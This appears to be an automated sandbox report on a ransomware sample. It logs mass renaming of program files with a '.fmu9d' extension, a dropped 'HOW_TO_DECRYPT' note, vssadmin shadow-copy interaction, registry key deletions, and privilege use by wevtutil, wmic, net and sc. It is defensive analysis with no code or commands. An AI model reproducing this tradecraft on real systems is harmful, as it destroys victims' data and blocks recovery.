File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\Images\Ratings\Yelp9.scale-200.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProPlusVL_MAK-ul-phn.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_tAIMHVI0aH80.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\152.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\small\shake.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailMediumTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-125_8wekyb3d8bbwe\Assets\AppTiles\contrast-black\MapsAppList.scale-125.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\tracked-send\js\plugins\tracked-send\js\home-view\selector.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_yoQWcHNCJ3c0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Windows.Photos_16.511.8780.0_x64__8wekyb3d8bbwe\Assets\PhotosSmallTile.contrast-white_scale-200.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_x64__8wekyb3d8bbwe\Assets\AppList.targetsize-40.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\WordVL_MAK-ul-phn.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_A_QgvbPrkFM0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsFeedbackHub_1.1612.10312.0_x64__8wekyb3d8bbwe\Assets\InsiderHubAppList.scale-200_contrast-black.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_neutral_split.scale-100_8wekyb3d8bbwe\Assets\AppTiles\MapsWideTile.scale-100.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\p2\org.eclipse.equinox.p2.engine\profileRegistry\JMC.profile\1423496926306.profile.gz.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_UDM3wmGVyaw0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\org.eclipse.equinox.p2.touchpoint.natives.nl_zh_4.4.0.v20140623020002.jar.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_J4pmeqDADjA0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\DeletedAllUserPackages\Microsoft.ZuneMusic_10.16112.11621.0_neutral_resources.scale-125_8wekyb3d8bbwe\Assets\contrast-white\AppList.scale-125_contrast-white.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\Assets\AppTiles\WeatherIcons\30x30\11.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\GenericMailWideTile.scale-400.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-computer\css\main-selector.css.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_PkTd1_LeDyI0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\db\bin\setNetworkClientCP.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_dg9IXi3igwQ0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ExcelR_OEM_Perp-ul-oob.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_XGYOS4ofS8o0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.SkypeApp_11.8.204.0_x64__kzf8qxf38zg5c\SkypeApp\Designs\Emoticons\large\bigsmile.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\microsoft.windowscommunicationsapps_17.7906.42257.0_x64__8wekyb3d8bbwe\images\HxMailLargeTile.scale-150.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\themes\dark\s_reportabuse-default_18.svg.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_O2cnd3eq5Og0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\files\dev\nls\hr-hr\ui-strings.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_TatpvflUFuU0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File created C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\on-boarding\images\themeless\Localized_images\de-de\auw1_HOW_TO_DECRYPT.txt C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Integration\C2RManifest.Word.Word.x-none.msi.16.x-none.xml.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_I43Fb5E1LwI0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\contrast-white\OneNoteSmallTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\s_link_18.svg.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_rnudMbOH3fU0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\ProjectPro2019VL_MAK_AE-ul-phn.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_5Po6Ebfagms0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\8041_40x40x32.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsMaps_5.1611.10393.0_x64__8wekyb3d8bbwe\Assets\SecondaryTiles\Directions\Place\RTL\contrast-black\MedTile.scale-200.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\activity-badge\js\nls\fr-ma\ui-strings.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_Yx9WfN-CpJg0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\HomeBusinessR_Retail-ul-oob.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_It0oHGMeD-c0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\Workflow\Density_Hollow.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.BingWeather_4.18.56.0_x64__8wekyb3d8bbwe\AppxManifest.xml C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.WindowsSoundRecorder_2017.130.1208.0_neutral_~_8wekyb3d8bbwe\AppxMetadata\AppxBundleManifest.xml C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.ZuneVideo_10.16112.11601.0_neutral_resources.scale-150_8wekyb3d8bbwe\AppxSignature.p7x C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\images\over-arrow-navigation.svg.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_yZxScI3L8XQ0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\sign-services-auth\js\nls\it-it\ui-strings.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_O7fsKlOqOu00.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Microsoft Office\root\Licenses16\SkypeforBusiness2019VL_KMS_Client_AE-ul.xrm-ms.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_rt4lVhRbHqE0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_x64__8wekyb3d8bbwe\Assets\EmbossBitmaps\Rounded Rectangle.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files (x86)\Adobe\Acrobat Reader DC\Reader\WebResources\Resource0\static\js\plugins\my-recent-files\js\plugin.js.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_V3YMC68TTfg0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Common Files\microsoft shared\ink\en-US\InkObj.dll.mui C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\Java\jdk1.8.0_66\lib\missioncontrol\plugins\com.jrockit.mc.rjmx_5.5.0.165303\lib\imap.jar.JbF4HGsbLHcGE1akPQibCZBW_AH2jtIvfYZhV1kErZ3_83lKZbk3zcs0.fmu9d C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.3DBuilder_13.0.10349.0_neutral_split.scale-180_8wekyb3d8bbwe\Assets\Office\BooleanIntersect.scale-180.png C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A
File opened for modification C:\Program Files\WindowsApps\Microsoft.Office.OneNote_17.7668.58071.0_x64__8wekyb3d8bbwe\images\osf\progress.gif C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe N/A

Launches sc.exe

Interacts with shadow copies

ransomware
Description Indicator Process Target
N/A N/A C:\Windows\SYSTEM32\vssadmin.exe N/A

Modifies registry class

Description Indicator Process Target
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\*\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Directory\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A
Key deleted \REGISTRY\MACHINE\SOFTWARE\Classes\Drive\shellex\ContextMenuHandlers\EPP C:\Windows\SYSTEM32\reg.exe N/A

Runs net.exe

Suspicious use of AdjustPrivilegeToken

Description Indicator Process Target
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\SYSTEM32\wevtutil.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeManageVolumePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 33 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 34 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 35 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: 36 N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncreaseQuotaPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSecurityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeTakeOwnershipPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeLoadDriverPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemProfilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemtimePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeProfSingleProcessPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeIncBasePriorityPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeCreatePagefilePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeBackupPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRestorePrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeDebugPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeSystemEnvironmentPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeRemoteShutdownPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A
Token: SeUndockPrivilege N/A C:\Windows\System32\Wbem\wmic.exe N/A

Suspicious use of WriteProcessMemory

Description Indicator Process Target
PID 2708 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 2708 wrote to memory of 3996 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 3996 wrote to memory of 804 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3996 wrote to memory of 804 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2708 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 2708 wrote to memory of 852 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 852 wrote to memory of 1028 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 852 wrote to memory of 1028 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2708 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 2708 wrote to memory of 3516 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 3516 wrote to memory of 3568 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3516 wrote to memory of 3568 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2708 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 2708 wrote to memory of 652 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 652 wrote to memory of 1588 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 652 wrote to memory of 1588 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2708 wrote to memory of 3420 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 2708 wrote to memory of 3420 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 3420 wrote to memory of 3764 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3420 wrote to memory of 3764 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2708 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 2708 wrote to memory of 3708 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 3708 wrote to memory of 1724 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 3708 wrote to memory of 1724 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2708 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 2708 wrote to memory of 1528 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 1528 wrote to memory of 500 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 1528 wrote to memory of 500 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2708 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 2708 wrote to memory of 856 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 856 wrote to memory of 1684 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 856 wrote to memory of 1684 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2708 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 2708 wrote to memory of 2688 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\net.exe
PID 2688 wrote to memory of 3148 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2688 wrote to memory of 3148 N/A C:\Windows\SYSTEM32\net.exe C:\Windows\system32\net1.exe
PID 2708 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 3000 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1108 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 4084 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1160 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1952 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1140 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
PID 2708 wrote to memory of 1480 N/A C:\Users\Admin\AppData\Local\Temp\dc9dfb97d069344353eea77b92769bb36b7c7e488778d3b04672469301e96413.exe C:\Windows\SYSTEM32\sc.exe
